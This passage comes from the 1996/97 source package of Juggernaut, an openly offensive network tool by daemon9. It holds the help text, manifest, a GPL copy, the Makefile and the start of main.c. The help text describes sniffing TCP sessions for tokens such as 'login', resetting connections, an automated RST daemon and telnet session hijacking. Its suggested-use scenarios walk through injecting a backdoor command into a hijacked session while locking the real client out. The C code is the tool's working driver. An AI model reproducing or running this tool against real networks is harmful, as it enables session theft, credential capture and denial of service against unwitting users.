+                        option will cause Juggernaut to shut the hell up.
+
+                        Not recommended unless you know what you are doing.
+
+    juggernaut -t xx            [ juggernaut -t 5 ]   
+        
+                        This option specifies the network read timeout (which 
+                        defaults to 10 seconds).  This value reflects how long
+                        Juggernaut will wait for network traffic before giving
+                        up.  In this case, it will wait 5 seconds.
+
+    juggernaut -s TOKEN         [ juggernaut -s login ]
+
+                        Dedicated sniffing mode.  Juggernaut will drop to the
+                        background and examine all TCP packets looking for
+                        TOKEN.  When TOKEN is located, it then isolates that 
+                        TCP circuit and captures the next 16 (the default
+                        enticement factor) packets and logs them to a file. It
+                        then resets and continues sifting through TCP traffic 
+                        looking for TOKEN.
+
+    juggernaut -s TOKEN -e xx   [ juggernaut -s daemon9 -e 1000 ]
+
+                        By specifying a larger enticement factor, you can
+                        capture more packets from a session.  This time, after
+                        locating TOKEN, Juggernaut will capture 1000 packets 
+                        before reseting.
+
+    juggernaut
+                        This starts the program in standard mode.
+     
+|-------------
+|Menu Options
+|-------------
+
+This is normal mode of operation for Juggernaut.  This is where the magic 
+happens, this is where the fun is. The program will examine all network
+traffic and add suitable TCP connections to the connection database (which
+is viewed with option 1).  After at least one connection is in the database, 
+you can start mucking around with it (connection construction and destruction 
+are indicated by the appearance of the "+" or the "-" at the console). Note 
+that connections involving a local interface may not show up (unless the
+localhost is dual-homed).
+
+One possible shortcoming of the program is the fact that it stores very
+little state information about connections in the database.  Juggernaut
+collects whatever information it needs (and doesn't have) on the fly.  As 
+such, a quiet connection (no traffic) will elude hijacking and reseting.  The 
+benefit of this is the fact that the program does not have to tie itself up 
+updating the shared memory segment with state every time a packet flies by.
+
+
+    ?) Help
+                        This file.
+
+    0) Program information
+
+                        Dumps some stuff...
+
+    1) Connection database
+    
+                        Dumps the current connection list and percent to 
+                        capacity.  Gives the option to wipe the database.
+
+    2) Spy on a connection
+
+                        Allows a user to spy on any connection in the database,
+                        with the option of logging the entire session to a
+                        file.
+
+    3) Reset a connection
+
+                        Allows the user to destroy any existing connection in 
+                        the database.
+
+    4) Automated connection reset daemon
+
+                        Allows the user to setup an automated TCP RST daemon 
+                        that will listen for connection request attempts
+                        from a specified source host (and optionally a 
+                        destination host) and then reset them before they
+                        have a chance to complete.  Requires a source IP
+                        address and optionally a destination address.  
+                        This module prints a "*" to the console when a
+                        connection request attempt is attempted and denied...
+                        
+    5) Simplex connection hijack
+
+                        Allows the user to insert a command into a telnet
+                        based TCP stream.  A short ACK storm ensues until the 
+                        connection is subsequently reset.
+
+    6) Interactive connection hijack
+
+                        Allows the user to take over a session from a 
+                        legitimate client.  This desynchs the client from the 
+                        server as the user takes over.  The resulting ACK 
+                        storm can be catastrophic and makes this interactive 
+                        session prone to failure.  If both of the target hosts 
+                        are on an ethernet, expect a momunmental ACK storm.
+
+    7) Packet assembly module
+
+                        The Prometheus module.  Construction of TCP, UDP, ICMP, 
+                        and IP packets.  The user has complete control over 
+                        most of the header fields and can opt for generating a
+                        pseudo-random value.  This module is far from done and
+                        needs some serious work.
+    
+    8) Souper sekret option number eight
+
+                        Sshh.
+
+    9) Step down
+                        Quitter.
+
+
+|-------------
+|Suggested Use
+|-------------
+
+    scenario 1: The passive observer
+                menu options 1,2
+
+                        The user is curious.  She simply waits for
+                        connections to arrive and then passively observes
+                        them.  Several invocations of Juggernaut may be
+                        started, each spying on a different connection.
+                        The user does not modify the flow of data or control.
+
+    scenario 2: The malicious observer
+                menu options 1,2,3
+
+                        Same scenario as above, except the user alters the
+                        flow of control and opts to destroy connections
+                        at some point.
+
+    scenario 3: The active observer
+                menu options 1,2,3,5,(6)
+
+                        Same as the previous situations, however the user
+                        inserts data into the stream before destroying it.
+    scenario 4: The imp
+                menu options 1,2,3,4
+
+                        The user is an impish devil and simply wants to
+                        cause trouble by setting up multiple ACRST daemons.
+
+    scenario 5: The active observer with poisonous reverse
+                menu options 1,2,4,5
+
+                        The user waits until a client establishes a connection
+                        with a targeted server and then sets up the ACRST 
+                        daemon to destroy all further connection-request
+                        attempts from the client.  The user then spys on the 
+                        connection, waiting for an opportune time to inject 
+                        a hijack packet into the stream containing a 
+                        backdooring command/pipeline.  The client will then
+                        have her connection RST (after a brief ACK storm).
+                        If the client attempts to re-establish the connection
+                        with the server, she will be denied and likely think
+                        it is a transient network error.  The user can then
+                        login into the server using the backdoor without fear
+                        of the client logging back in.
+
+
+      
+Juggernaut is a Guild Corporation production, (c) 1996/7.
+ 
+    [corporate persuasion through Internet terrorism]
+                                                           
+EOF
+<-->
+<++> Juggernaut/ClothLikeGauze/MANIFEST
+
+       File Manifest for Juggernaut 1.0
+ 	----------------------------
+      1996/7 daemon9[guild|phrack|r00t]
+ 	----------------------------
+ClothLikeGauze/     Docs
+    .help           Helpfile
+    copyright	    The legal tie that binds.
+    Install         Installation instructions
+    MANIFEST	    This file
+Makefile	    makefile
+NumberOneCrush/	    Sources				
+    main.c	    main logic
+    mem.c	    shared memory/semaphore functions
+    menu.c	    menu functions
+    prometheus.c    packet assembly workshop module
+    net.c	    socket/network functions
+    surplus.c       dumping ground
+
+
+	Version history
+	---------------
+
+version a1:
+-----------
+11.30.96:   Decided to start.  Juggernaut framework and queue stuff.  Used 
+            linked list queue originally to store connections.
+12.01.96:   Sniffing/spying/logging/RST stuff.
+12.02-04:   Not sure what I did here.  I think I had a large turkey samich.
+12.05.96:   Redid memory abstract data type.  Multithreaded.  Implemented 
+            shared memory segment and semaphore for access control.
+            Dumped ALL the dynamic memory allocation code.
+12.06.96:   Added packet assembly workshop hooks.  Added curses.  Removed 
+            curses.
+12.07.96:   No coding today.
+12.08.96:   Non-interactive hijacking completed.  I think we're ready for 
+            beta now.
+
+version b1:
+-----------
+12.09.96:   IP_HDRINCL crap added.
+12.15-18:   I was in NYC for the r00tparty.  No coding then.
+12.19.96:   Added automated RST stuff.
+12.20-27:   No coding.
+12.28.96:   Started work on interactive hijacking.  Damned ACK storms.
+12.30.96:   Started packet assembly module for reals.
+
+version b2:
+-----------
+01.25.97:   Added network timeout logic.
+01.26.97-
+04.01.97:   How can you possibly expect me to account for all that time?  
+            I went to Germany with alhambra for a networking summit and 
+            all over the US for other work, I was even in a Discovery 
+            special on IW...
+
+version 1.0:
+------------
+04.02.97:   Here it is.                
+<-->
+<++> Juggernaut/ClothLikeGauze/ToDo
+
+Juggernaut ToDo list
+--------------------
+ + re-structure multitasking model to give the option of
+   using multi-processing OR multi-threading
+ + Create boot image
+ + Support for ongoing connections
+ + Support for healthy choice hotdog sequencer
+ + Add arp cache seeding routine; as connections are added, MAC
+   addresses will be added to the arp cache
+ + Add support for different verbosity levels
+ + Add support for IP and TCP options in packet assembly module
+ + Better packet assembly support as a whole
+ + Better code module plug-in support
+ + much more robust packet sniffing module with support for
+   multiple protocols
+ + um, interactive hijacking that doesn't kill the client
+<-->
+<++> Juggernaut/ClothLikeGauze/copyright
+ 
+			Juggernaut 
+ 
+Copyright (c) 1996/7 by daemon9/route [Guild] (route@infonexus.com)
+  
+Juggernaut source code, documentation, auxilliary programs, and 
+executables are Copyright 1996/7 daemon9[guild].  All rights reserved.
+
+----------------------------------------------------------------------
+
+		    GNU GENERAL PUBLIC LICENSE
+		       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.
+                          675 Mass Ave, Cambridge, MA 02139, USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+			    Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Library General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+		    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+			    NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+		     END OF TERMS AND CONDITIONS
+
+	Appendix: How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) 19yy  <name of author>
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+    Gnomovision version 69, Copyright (C) 19yy name of author
+    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary.  Here is a sample; alter the names:
+
+  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+  `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+  <signature of Ty Coon>, 1 April 1989
+  Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs.  If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library.  If this is what you want to do, use the GNU Library General
+Public License instead of this License.
+<-->
+<++> Juggernaut/Install
+Juggernaut 1.0 Installation Instructions
+----------------------------------------
+1.  Are you a fucking moron?  If so, goto step 6; you are done.
+
+2.  Edit the Makefile.  You may wish to change a few of the
+    defines:
+
+    USENAME:    Define this to have Juggernaut attempt to 
+                resolve IP addresses into FQDNs...  It's
+                slower but more verbose this way.
+    MULTI_P:    Define this to use multi-process model of 
+                multi-tasking.
+    THREAD:     Define this to use multi-threaded model of
+                multi-tasking.  Be sure to also link in
+                the pthreads library.  Not implemented yet.
+    IP_HDRINCL: Define this if you want/need to use the
+                IP_HDRINCL socket option to build IP
+                headers.
+    NOHUSH:     If defined, Juggernaut will notify the user
+                audibly when a connection is added.
+    GREED:      If defined, Juggernaut will attempt to add
+                any and ALL TCP based connections to the 
+                database.  This is not recommended unless
+                you know what you are doing...
+    FASTCHECK:  Define this to use a fast x86 assembler 
+                implementation of the IP checksum routine.
+                May not work on all systems.  That's why
+                you have the option.
+3. make all
+
+4. yay.
+
+5. ./juggernaut -h
+<-->
+<++> Juggernaut/Makefile
+# Juggernaut Makefile
+# 1996/7 daemon9[guild|phrack|r00t]
+
+CC      =   gcc
+#LIBS    =   -L/usr/lib -lpthread
+CFLAGS  =   -O3 -funroll-loops -fomit-frame-pointer -pipe -m486 #-Wall
+DEFINES =   -DMULTI_P -DNOHUSH -DUSENAME -DFASTCHECK
+DEFINES +=  #-DGREED #-DIP_HDRINCL #-DTHREAD 
+OBJECTS =   NumberOneCrush/main.o NumberOneCrush/menu.o\
+            NumberOneCrush/mem.o NumberOneCrush/prometheus.o\
+            NumberOneCrush/net.o NumberOneCrush/surplus.o
+
+.c.o:
+	$(CC) $(CFLAGS) $(DEFINES) -c $< -o $@
+
+all: JUGGERNAUT
+
+JUGGERNAUT: $(OBJECTS)
+	$(CC) $(CFLAGS) $(DEFINES) $(OBJECTS) $(LIBS) -o juggernaut
+	strip juggernaut
+
+clean:
+	rm -f core juggernaut juggernaut.log.snif juggernaut.log.spy
+	rm -rf NumberOneCrush/*.o
+<-->
+<++> Juggernaut/NumberOneCrush/main.c
+/*
+ *
+ *			            Juggernaut
+ *				    Version b2
+ *
+ *                            1996/7 Guild productions
+ *			     daemon9[guild|phrack|r00t]
+ *
+ *                         comments to route@infonexus.com
+ *
+ *  This coding project made possible by a grant from the Guild corporation
+ * 
+ *  main.c - main control logic and program driver.  Consists mainly of wrappers 
+ *  to setup the main subfunctions.
+ *
+ *
+ */
+
+#include <string.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <ctype.h>
+#include <syslog.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/resource.h>
+#include <netinet/in.h>
+
+#ifdef THREAD
+#include <pthread.h>
+#endif
+
+#define MINIBUF 10
+#define BUFSIZE 512
+#define DEVICE "eth0"
+#define LOGFILE "./juggernaut.log.spy"
+
+char version[]="1.0\0";
+int sigsentry=1;		    /* Signal sentry */
+int ripsock=0;			    /* RIP socket */
+int linksock=0;			    /* SOCK PACKET socket */
+int hpid=0;			    /* hunter child PID */
+int acrstpid=0;			    /* automated connection reset PID */
+int netreadtimeout=10;		    /* Network read timeout in seconds */
+int verbosity=1;		    /* Level of verbosity */
+int enticementfactor=16;            /* Enticing packets!@ */
+time_t uptime=0;                    /* How long have we been running */
+
+struct connectionInfo{		    /* Simple tuple information */
+    unsigned long saddr;            /* Source IP */
+    unsigned long daddr;            /* Destination IP */
+    unsigned short sport;           /* Source TCP Port */  
+    unsigned short dport;           /* Destination TCP Port */
+};
+
+
+/*
+ *  Main control logic.  All the main logic is implemented in the switch 
+ *  statement.
+ */
+
+int main(argc,argv)
+int argc;
+char *argv[];
+{
+
+    void usage(char *);
+    void hunt();		
+    void spy();
+    void rst();
+    void arst();
+    void pkta();
+    void simplexhijack();
+    void hijack();
+    void powerup();
+    void minit();
+    void mwipe();
+    void mmain();
+    void twitch();
+    void cleanexit();
+    void bloodhound(char *,int);
+    void bookworm();
+    void dbmanip();
+    void jinfo();
+    int rawsock();
+    int tap();
+    float dump();			
+		
+    char buf[MINIBUF]={0};
+    char token[2*MINIBUF]={0};
+    int c;
+                                
+    if(geteuid()||getuid()){	            /* r00t? */
+        fprintf(stderr,"UID or EUID of 0 needed...\n");
+        exit(0);
+        }
+                          	            /* Parse command-line arguments */
+    while((c=getopt(argc,argv,"s:e:t:vVhH"))!=-1){
+        switch(c){
+            case 's':                       /* dedicated sniffing mode */
+                strncpy(token,optarg,(sizeof(token)-1));
+                break;
+ 	    case 'e':                       /* Enticement factor (only valid 
+                                               with -s option) */
+	        enticementfactor=atoi(optarg);
+		break;
+	    case 't':                       /* Network alarm timeout */
+	        netreadtimeout=atoi(optarg);
+		break;
+	    case 'v':	                    /* decrease verbosity */	
+	        verbosity=0;
+	        break;
+	    case 'V':	                    /* version info */	
+                jinfo();
+                exit(0);
+            case 'h':                       /* Help is on the way my friend */
+                usage(argv[0]);
+                exit(0);
+            case 'H':                       /* Help is on the way my friend */
+                bookworm();
+                exit(0);
+	    default:
+	        usage(argv[0]);
+	        break;
+	    }     
+    }
+    if(token[0]){
+        bloodhound(token,enticementfactor); 
+        exit(0);
+    }
+
+    mwipe();
+    minit();				    /* Initial menu */
+    fprintf(stderr,"[cr]");
+    getchar();
+
+    signal(SIGINT,twitch);		    /* Catch these signals */
+    signal(SIGQUIT,twitch);
+
+    ripsock=rawsock();			    /* Setup RIP socket */
+    linksock=tap(DEVICE);                   /* Setup link socket */ 
+
+    powerup();				    /* Setup shared memory and 
+                                               semaphore */
+    time(&uptime);                          /* Start the uptime timer */
+    hunt();				    /* Start the connection hunter */
+	
+    while(1){
+    	mwipe();
+    	mmain();
+        bzero(&buf,sizeof(buf));
+    	fgets(buf,sizeof(buf),stdin);
+        switch(buf[0]){
+            case '?':
+                mwipe();
+                bookworm();
+                mwipe();
+                break;
+            case '0':
+                mwipe();
+                jinfo();
+                mwipe();
+                break;
+    	    case '1':
+    	        mwipe();
+                dbmanip();
+    		mwipe();
+    		break;
+    	    case '2':               /* Watch a connection. */
+    	        mwipe();
+    		spy();			
+    		mwipe();
+    		break;
+    	    case '3':	            /* Kill a connection. */
+    		mwipe();
+    		rst();			
+    		mwipe();
+		break;
+	    case '4':               /* Automated CRST daemon. */
+		mwipe();
+		arst();			
+		mwipe();
+		break;
+	    case '5':		    /* Insert a single command. */
+		mwipe();		
+		simplexhijack();
+		mwipe();
+		break;
+	    case '6':		    /* Hijack the session from the client */
+		mwipe();		
+		hijack();
+		mwipe();
+		break;
+	    case '7':	            /* The packet assembly workshop */
+		mwipe();
+		pkta();			
+		mwipe();
+		break;
+	    case '8':		    /* For future use. */
+		break;
+            case '9':
+                cleanexit();
+            default:
+	        continue;
+        }
+    }
+		                        /* NOT REACHED */
+    return(0);
+}
+
+
+/*
+ *  chunt wrapper
+ */
+
+void hunt(){
+
+#ifdef MULTI_P
+    void spasm();		    	/* Handles the user defined signal */
+    void chunt();
+
+    switch((hpid=fork())){
+        case 0:				    /* Child */
+	    signal(SIGUSR1,spasm);
+	    signal(SIGINT,SIG_IGN);	    /* Catch these signals */
+	    signal(SIGQUIT,SIG_IGN);
+	    close(ripsock);		    /* Not needed in hunter */
+	    chunt();
+        default:
+	    break;			    /* Parent continues */
+        case -1:
+	    if(verbosity)perror("(hunt) internal forking error [fatal]");
+	    exit(1);
+    }	
+#endif
+
+#ifdef THREAD
+
+    MULTIPLE THREADS OF EXECUTION IS NOT IMPLEMENTED YET.
+
+    void chunt();
+
+    pthread_t hunter_t;
+
+    pthread_create(&hunter_t,NULL,(void *)chunt(),(void *)NULL);
+
+#endif
+
+}
+
+
+/*
+ *  cspy wrapper
+ */
+
+void spy(){
+
+    void convulsion();
+    float dump();
+    struct connectionInfo *checkc(int);
+    void cspy(struct connectionInfo *,FILE *);
+
+    char buf[MINIBUF];
+    unsigned short val;
+    struct connectionInfo *target;
+    FILE *fp=0;	
+
+    dump();							
+	
+    while(1){
+    	fprintf(stderr,"\nChoose a connection [q] >");
+    	fgets(buf,sizeof(buf),stdin);
+    	if(buf[0]==0x0a||buf[0]=='q')return;
+    	if(!(int)(val=atoi(buf)))continue;
+    	if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");	
+    	else break;
+    }
+    fprintf(stderr,"\nDo you wish to log to a file as well? [y/N] >");
+    fgets(buf,sizeof(buf),stdin);
+    if(toupper(buf[0])=='Y'){
+    	if(!(fp=fopen(LOGFILE,"a+"))){
+            if(verbosity){
+                fprintf(stderr,"Cannot open file for logging, skipping operation.\n");
+    	        fprintf(stderr,"[cr]");
+    	        getchar();
+            }
+        }
+    }
+    fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when done.\n");
+    signal(SIGINT,convulsion);
+    sigsentry=1;
+    cspy(target,fp);
+    if(fp)fclose(fp);
+}
+
+
+/*
+ *  crst wrapper
+ */ 
+
+void rst(){
+
+    void convulsion();
+    float dump();
+    void crst(struct connectionInfo *);    
+
+    struct connectionInfo *checkc(int);
+
+    char buf[MINIBUF];
+    unsigned short val;
+    struct connectionInfo *target;
+
+    dump();
+	
+    while(1){
+        fprintf(stderr,"\nChoose a connection [q] >");
+	fgets(buf,sizeof(buf),stdin);
+	if(buf[0]==0x0a||buf[0]=='q')return;
+   	if(!(int)(val=atoi(buf)))continue;
+	if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");
+	else break;
+    }
+    signal(SIGINT,convulsion);
+    crst(target);							
+    fprintf(stderr,"[cr]");
+    getchar();
+}
+
+
+/*
+ *  acrst wrapper
+ */ 
+
+void arst(){
+
+    void convulsion();
+    float dump();
+    void acrst(unsigned long,unsigned long);
+    char *hostLookup(unsigned long);
+    unsigned long nameResolve(char *);
+
+    char buf[4*MINIBUF];
+    unsigned long source,target;
+				            /* Setup addresing info */
+    fprintf(stderr,"\nEnter source IP [q] >");
+    fgets(buf,sizeof(buf),stdin);
+    if(buf[0]==0x0a||buf[0]=='q')return;			
+    if(!(source=nameResolve(buf))){
+    	if(verbosity){
+            fprintf(stderr,"Name lookup failure: `%s`\n[cr]",buf);
